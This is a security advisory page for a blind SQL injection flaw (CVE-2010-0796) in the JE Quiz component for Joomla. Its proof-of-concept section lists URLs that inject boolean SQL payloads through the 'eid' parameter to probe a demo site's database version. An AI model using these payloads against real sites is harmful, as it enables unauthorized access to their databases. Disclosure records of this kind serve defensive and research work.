
Topic: |
Joomla (JE Quiz component 1.0) BLIND SQL Injection Vulnerability |
Credit: |
B-HUNT3|2 |
Date: |
2010.03.04 |
CWE: |
CWE-89 (Show similar)
|
CVE: |
CVE-2010-0796 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| High |
No |
| Yes |
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> TITLE: Joomla (JE Quiz component) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TYPE: COMMERCIAL
[~]>> PRICE: $20.00
[~]>> TESTED ON: Demo Site
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Input var eid is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.b01 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> PROOF OF CONCEPT:
[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=[SQL]&Itemid=163
[~]>> {RETURN TRUE::RETURN FALSE}
[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(
@@version,1,1)=5,1,0)&Itemid=163
[~]>>
http://demo.joomlaextensions.co.in/index.php?option=com_jequizmanagement&view=question&eid=1+AND+1=if(substring(
@@version,1,1)=4,1,0)&Itemid=163
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[END ADVISORY]...
References:
http://xforce.iss.net/xforce/xfdb/56009
http://www.securityfocus.com/bid/38032
http://www.exploit-db.com/exploits/11287
http://secunia.com/advisories/38412
http://packetstormsecurity.org/1001-exploits/joomlajequiz-sql.txt
http://osvdb.org/62039
[ ASCII VERSION ]
|